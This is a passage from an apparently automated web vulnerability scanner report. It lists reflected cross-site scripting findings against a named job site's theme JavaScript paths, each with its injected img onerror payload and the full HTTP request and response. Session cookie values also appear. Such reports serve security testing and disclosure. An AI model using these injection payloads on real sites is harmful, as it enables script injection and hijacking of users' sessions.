Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: jobs.ctg.eu

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 17:15:49 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: SESS5fce01b171785c9633d86359009a9819=27a9e43b9843be15421a2e6cfd912ea9; expires=Sun, 15-May-2011 20:49:10 GMT; path=/; domain=.jobs.ctg.eu
Last-Modified: Fri, 22 Apr 2011 17:15:50 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6707

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites-all-themes-threesixty-jsf89d3"><img src=a onerror=alert(1)>87598a82479-effects.js not-front not-logged-in page-sites no-sidebars">
...[SNIP]...

3.143. http://jobs.ctg.eu/sites/all/themes/threesixty/js/effects.js [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/themes/threesixty/js/effects.js

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f62b1"><img%20src%3da%20onerror%3dalert(1)>24eb6b0f0fc was submitted in the REST URL parameter 6. This input was echoed as f62b1"><img src=a onerror=alert(1)>24eb6b0f0fc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sites/all/themes/threesixty/js/effects.jsf62b1"><img%20src%3da%20onerror%3dalert(1)>24eb6b0f0fc?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:43:21 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:43:21 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6707

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites-all-themes-threesixty-js-effects.jsf62b1"><img src=a onerror=alert(1)>24eb6b0f0fc not-front not-logged-in page-sites no-sidebars">
...[SNIP]...

3.144. http://jobs.ctg.eu/sites/all/themes/threesixty/js/jquery.filestyle.mini.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/themes/threesixty/js/jquery.filestyle.mini.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 25e58"><img%20src%3da%20onerror%3dalert(1)>c35af25cab3 was submitted in the REST URL parameter 1. This input was echoed as 25e58"><img src=a onerror=alert(1)>c35af25cab3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sites25e58"><img%20src%3da%20onerror%3dalert(1)>c35af25cab3/all/themes/threesixty/js/jquery.filestyle.mini.js?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22; has_js=1

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:38:50 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:38:51 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6759

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites25e58"><img src=a onerror=alert(1)>c35af25cab3-all-themes-threesixty-js-jquery.filestyle.mini.js not-front not-logged-in page-sites25e58img-srca-onerroralert1c35af25cab3 no-sidebars">
...[SNIP]...

3.145. http://jobs.ctg.eu/sites/all/themes/threesixty/js/jquery.filestyle.mini.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/themes/threesixty/js/jquery.filestyle.mini.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3bcef"><img%20src%3da%20onerror%3dalert(1)>3002399490 was submitted in the REST URL parameter 2. This input was echoed as 3bcef"><img src=a onerror=alert(1)>3002399490 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sites/all3bcef"><img%20src%3da%20onerror%3dalert(1)>3002399490/themes/threesixty/js/jquery.filestyle.mini.js?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22; has_js=1

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:40:45 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:40:46 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6720

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites-all3bcef"><img src=a onerror=alert(1)>3002399490-themes-threesixty-js-jquery.filestyle.mini.js not-front not-logged-in page-sites no-sidebars">
...[SNIP]...

3.146. http://jobs.ctg.eu/sites/all/themes/threesixty/js/jquery.filestyle.mini.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/themes/threesixty/js/jquery.filestyle.mini.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a0d47"><img%20src%3da%20onerror%3dalert(1)>eca9130c7e0 was submitted in the REST URL parameter 3. This input was echoed as a0d47"><img src=a onerror=alert(1)>eca9130c7e0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sites/all/themesa0d47"><img%20src%3da%20onerror%3dalert(1)>eca9130c7e0/threesixty/js/jquery.filestyle.mini.js?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22; has_js=1

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:42:37 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:42:38 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6721

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites-all-themesa0d47"><img src=a onerror=alert(1)>eca9130c7e0-threesixty-js-jquery.filestyle.mini.js not-front not-logged-in page-sites no-sidebars">
...[SNIP]...

3.147. http://jobs.ctg.eu/sites/all/themes/threesixty/js/jquery.filestyle.mini.js [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/themes/threesixty/js/jquery.filestyle.mini.js

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2d2bc"><img%20src%3da%20onerror%3dalert(1)>f03d1286c4 was submitted in the REST URL parameter 4. This input was echoed as 2d2bc"><img src=a onerror=alert(1)>f03d1286c4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sites/all/themes/threesixty2d2bc"><img%20src%3da%20onerror%3dalert(1)>f03d1286c4/js/jquery.filestyle.mini.js?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22; has_js=1

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:44:05 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:44:05 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6720

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites-all-themes-threesixty2d2bc"><img src=a onerror=alert(1)>f03d1286c4-js-jquery.filestyle.mini.js not-front not-logged-in page-sites no-sidebars">
...[SNIP]...

3.148. http://jobs.ctg.eu/sites/all/themes/threesixty/js/jquery.filestyle.mini.js [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/themes/threesixty/js/jquery.filestyle.mini.js

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d066f"><img%20src%3da%20onerror%3dalert(1)>a7f78c0cf8f was submitted in the REST URL parameter 5. This input was echoed as d066f"><img src=a onerror=alert(1)>a7f78c0cf8f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sites/all/themes/threesixty/jsd066f"><img%20src%3da%20onerror%3dalert(1)>a7f78c0cf8f/jquery.filestyle.mini.js?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22; has_js=1

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:45:14 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:45:14 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6721

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites-all-themes-threesixty-jsd066f"><img src=a onerror=alert(1)>a7f78c0cf8f-jquery.filestyle.mini.js not-front not-logged-in page-sites no-sidebars">
...[SNIP]...

3.149. http://jobs.ctg.eu/sites/all/themes/threesixty/js/jquery.filestyle.mini.js [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/themes/threesixty/js/jquery.filestyle.mini.js

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d5178"><img%20src%3da%20onerror%3dalert(1)>0973140bc22 was submitted in the REST URL parameter 6. This input was echoed as d5178"><img src=a onerror=alert(1)>0973140bc22 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sites/all/themes/threesixty/js/jquery.filestyle.mini.jsd5178"><img%20src%3da%20onerror%3dalert(1)>0973140bc22?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22; has_js=1

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:46:21 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:46:21 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6721

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites-all-themes-threesixty-js-jquery.filestyle.mini.jsd5178"><img src=a onerror=alert(1)>0973140bc22 not-front not-logged-in page-sites no-sidebars">
...[SNIP]...

3.150. http://jobs.ctg.eu/sites/all/themes/threesixty/js/swfobject.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/themes/threesixty/js/swfobject.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 30ba9"><img%20src%3da%20onerror%3dalert(1)>805a34d1d8a was submitted in the REST URL parameter 1. This input was echoed as 30ba9"><img src=a onerror=alert(1)>805a34d1d8a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sites30ba9"><img%20src%3da%20onerror%3dalert(1)>805a34d1d8a/all/themes/threesixty/js/swfobject.js?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:37:50 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:37:51 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6747

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites30ba9"><img src=a onerror=alert(1)>805a34d1d8a-all-themes-threesixty-js-swfobject.js not-front not-logged-in page-sites30ba9img-srca-onerroralert1805a34d1d8a no-sidebars">
...[SNIP]...

3.151. http://jobs.ctg.eu/sites/all/themes/threesixty/js/swfobject.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/themes/threesixty/js/swfobject.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ccd50"><img%20src%3da%20onerror%3dalert(1)>4aae54469d0 was submitted in the REST URL parameter 2. This input was echoed as ccd50"><img src=a onerror=alert(1)>4aae54469d0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sites/allccd50"><img%20src%3da%20onerror%3dalert(1)>4aae54469d0/themes/threesixty/js/swfobject.js?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:39:39 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:39:40 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6709

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites-allccd50"><img src=a onerror=alert(1)>4aae54469d0-themes-threesixty-js-swfobject.js not-front not-logged-in page-sites no-sidebars">
...[SNIP]...

3.152. http://jobs.ctg.eu/sites/all/themes/threesixty/js/swfobject.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/themes/threesixty/js/swfobject.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 40040"><img%20src%3da%20onerror%3dalert(1)>74cc53efc7d was submitted in the REST URL parameter 3. This input was echoed as 40040"><img src=a onerror=alert(1)>74cc53efc7d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sites/all/themes40040"><img%20src%3da%20onerror%3dalert(1)>74cc53efc7d/threesixty/js/swfobject.js?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:41:33 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:41:34 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6709

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites-all-themes40040"><img src=a onerror=alert(1)>74cc53efc7d-threesixty-js-swfobject.js not-front not-logged-in page-sites no-sidebars">
...[SNIP]...

3.153. http://jobs.ctg.eu/sites/all/themes/threesixty/js/swfobject.js [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/themes/threesixty/js/swfobject.js

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 50274"><img%20src%3da%20onerror%3dalert(1)>beb612c26a5 was submitted in the REST URL parameter 4. This input was echoed as 50274"><img src=a onerror=alert(1)>beb612c26a5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sites/all/themes/threesixty50274"><img%20src%3da%20onerror%3dalert(1)>beb612c26a5/js/swfobject.js?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:43:22 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:43:22 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6709

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites-all-themes-threesixty50274"><img src=a onerror=alert(1)>beb612c26a5-js-swfobject.js not-front not-logged-in page-sites no-sidebars">
...[SNIP]...

3.154. http://jobs.ctg.eu/sites/all/themes/threesixty/js/swfobject.js [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/themes/threesixty/js/swfobject.js

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2ed8c"><img%20src%3da%20onerror%3dalert(1)>e9fc30c79e2 was submitted in the REST URL parameter 5. This input was echoed as 2ed8c"><img src=a onerror=alert(1)>e9fc30c79e2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sites/all/themes/threesixty/js2ed8c"><img%20src%3da%20onerror%3dalert(1)>e9fc30c79e2/swfobject.js?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:44:38 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:44:38 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6709

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites-all-themes-threesixty-js2ed8c"><img src=a onerror=alert(1)>e9fc30c79e2-swfobject.js not-front not-logged-in page-sites no-sidebars">
...[SNIP]...

3.155. http://jobs.ctg.eu/sites/all/themes/threesixty/js/swfobject.js [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/themes/threesixty/js/swfobject.js

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8edfa"><img%20src%3da%20onerror%3dalert(1)>6de297366e6 was submitted in the REST URL parameter 6. This input was echoed as 8edfa"><img src=a onerror=alert(1)>6de297366e6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

